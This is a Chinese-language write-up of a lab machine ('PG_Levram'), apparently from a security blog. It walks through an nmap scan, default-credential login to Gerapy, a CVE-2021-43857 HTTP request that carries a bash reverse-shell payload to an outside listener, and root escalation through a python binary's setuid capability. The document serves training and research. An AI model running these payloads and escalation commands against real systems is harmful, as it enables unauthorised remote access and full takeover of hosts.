信息收集:
root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.24Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-22 19:56 CSTNmap scan report for 192.168.216.24Host is up (0.0036s latency).Not shown: 65533 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)8000/tcp open http-alt WSGIServer/0.2 CPython/3.10.6| fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 Not Found| Date: Sat, 22 Feb 2025 11:57:02 GMT| Server: WSGIServer/0.2 CPython/3.10.6| Content-Type: text/html| Content-Length: 9979| Vary: Origin| <!DOCTYPE html>| <html lang="en">| <head>| <meta http-equiv="content-type" content="text/html; charset=utf-8">| <title>Page not found at /nice ports,/Trinity.txt.bak</title>| <meta name="robots" content="NONE,NOARCHIVE">| <style type="text/css">| html * { padding:0; margin:0; }| body * { padding:10px 20px; }| body * * { padding:0; }| body { font:small sans-serif; background:#eee; color:#000; }| body>div { border-bottom:1px solid #ddd; }| font-weight:normal; margin-bottom:.4em; }| span { font-size:60%; color:#666; font-weight:normal; }| table { border:none; border-collapse: collapse; width:100%; }| vertical-align:top; padding:2px 3px; }| width:12em; text-align:right; color:#6| GetRequest: | HTTP/1.1 200 OK| Date: Sat, 22 Feb 2025 11:56:57 GMT| Server: WSGIServer/0.2 CPython/3.10.6| Content-Type: text/html; charset=utf-8| Vary: Accept, Origin| Allow: GET, OPTIONS| Content-Length: 2530|_ <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1"><link rel=icon href=/favicon.ico><title>Gerapy</title><link href=/static/css/chunk-10b2edc2.79f68610.css rel=prefetch><link href=/static/css/chunk-12e7e66d.8f856d8c.css rel=prefetch><link href=/static/css/chunk-39423506.2eb0fec8.css rel=prefetch><link href=/static/css/chunk-3a6102b3.0fe5e5eb.css rel=prefetch><link href=/static/css/chunk-4a7237a2.19df386b.css rel=prefetch><link href=/static/css/chunk-531d1845.b0b0d9e4.css rel=prefetch><link href=/static/css/chunk-582dc9b0.d60b5161.css rel=prefetch><link href=/static/css/chun|_http-cors: GET POST PUT DELETE OPTIONS PATCH|_http-server-header: WSGIServer/0.2 CPython/3.10.6|_http-title: Gerapy1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port8000-TCP:V=7.80%I=7%D=2/22%Time=67B9BB89%P=x86_64-pc-linux-gnu%r(GeSF:tRequest,AAA,"HTTP/1.1x20200x20OKrnDate:x20Sat,x2022x20Febx202SF:025x2011:56:57x20GMTrnServer:x20WSGIServer/0.2x20CPython/3.10.SF:6rnContent-Type:x20text/html;x20charset=utf-8rnVary:x20Accept,xSF:20OriginrnAllow:x20GET,x20OPTIONSrnContent-Length:x202530rnrSF:n<!DOCTYPEx20html><htmlx20lang=en><head><metax20charset=utf-8><metaSF:x20http-equiv=X-UA-Compatiblex20content="IE=edge"><metax20name=viewSF:portx20content="width=device-width,initial-scale=1"><linkx20rel=icoSF:nx20href=/favicon.ico><title>Gerapy</title><linkx20href=/static/css/SF:chunk-10b2edc2.79f68610.cssx20rel=prefetch><linkx20href=/static/cssSF:/chunk-12e7e66d.8f856d8c.cssx20rel=prefetch><linkx20href=/static/csSF:s/chunk-39423506.2eb0fec8.cssx20rel=prefetch><linkx20href=/static/cSF:ss/chunk-3a6102b3.0fe5e5eb.cssx20rel=prefetch><linkx20href=/static/SF:css/chunk-4a7237a2.19df386b.cssx20rel=prefetch><linkx20href=/staticSF:/css/chunk-531d1845.b0b0d9e4.cssx20rel=prefetch><linkx20href=/statiSF:c/css/chunk-582dc9b0.d60b5161.cssx20rel=prefetch><linkx20href=/statSF:ic/css/chun")%r(FourOhFourRequest,279E,"HTTP/1.1x20404x20Notx20FounSF:drnDate:x20Sat,x2022x20Febx202025x2011:57:02x20GMTrnServer:xSF:20WSGIServer/0.2x20CPython/3.10.6rnContent-Type:x20text/htmlrnSF:Content-Length:x209979rnVary:x20Originrnrn<!DOCTYPEx20html>n<SF:htmlx20lang="en">n<head>nx20x20<metax20http-equiv="content-typSF:e"x20content="text/html;x20charset=utf-8">nx20x20<title>Pagex2SF:0notx20foundx20atx20/nicex20ports,/Trinity.txt.bak</title>nx20SF:x20<metax20name="robots"x20content="NONE,NOARCHIVE">nx20x20<stSF:ylex20type="text/css">nx20x20x20x20htmlx20*x20{x20padding:0SF:;x20margin:0;x20}nx20x20x20x20bodyx20*x20{x20padding:10pxx2SF:020px;x20}nx20x20x20x20bodyx20*x20*x20{x20padding:0;x20}nSF:x20x20x20x20bodyx20{x20font:smallx20sans-serif;x20background:#eSF:ee;x20color:#000;x20}nx20x20x20x20body>divx20{x20border-bottomSF::1pxx20solidx20#ddd;x20}nx20x20x20x20h1x20{x20font-weight:norSF:mal;x20margin-bottom:.4em;x20}nx20x20x20x20h1x20spanx20{x20fSF:ont-size:60%;x20color:#666;x20font-weight:normal;x20}nx20x20x20SF:x20tablex20{x20border:none;x20border-collapse:x20collapse;x20widthSF::100%;x20}nx20x20x20x20td,x20thx20{x20vertical-align:top;x20pSF:adding:2pxx203px;x20}nx20x20x20x20thx20{x20width:12em;x20textSF:-align:right;x20color:#6");No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=2/22%OT=22%CT=1%CU=39242%PV=Y%DS=4%DC=T%G=Y%TM=67B9BBEOS:B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPSOS:(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST1OS:1NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECNOS:(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AOS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(ROS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%FOS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 199/tcp)HOP RTT ADDRESS1 2.31 ms 192.168.45.12 2.32 ms 192.168.45.2543 2.82 ms 192.168.251.14 3.59 ms 192.168.216.24OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 112.99 seconds开放了8000的http服务,检索exp
需要认证,尝试一手admin/admin成功进入系统
使用exp报错懒得处理,CVE-2021-43857,直接发送数据包:
POST /api/project/1/parse HTTP/1.1Host: 192.168.216.24:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateAuthorization: Token bab40ccd50ebd5bbaa28f14015330b4d00a824b8Connection: closeReferer: http://vulfocus.fofa.so:37380/Cookie: zbx_sessionid=80402dd7222257588aeff3a3f5a4b7af; td_cookie=448830462; Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1639631760; zmGroup=1; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640325563Cache-Control: max-age=0Content-Length: 79Content-Type: application/x-www-form-urlencoded{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.184/3000 0>&1'`"}
成功反弹shell,拿到local
常规检查GUID和sudo -l无果,上传linpeas.sh
CVE-2021-4034_PwnKit提权失败
没思路,看了下hints,这里新学到了一个Capabilities提权
我们运行SUID的命令时,通常只是需要使用一小部分特权,但是使用SUID,却可以拥有root用户的全部权限。所以,一旦SUID的文件存在漏洞,便可能被利用,以root身份执行其他操作。
SUID的问题,主要在于权限控制太粗糙。为了对root身份进行更加精细的控制,Linux增加了另一种机制,即capabilities。
|
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
getcap -r / 2>/dev/null
python有权限setuid
/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'
成功提权,拿到proof
原文始发于微信公众号(EuSRC安全实验室):PG_Levram
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论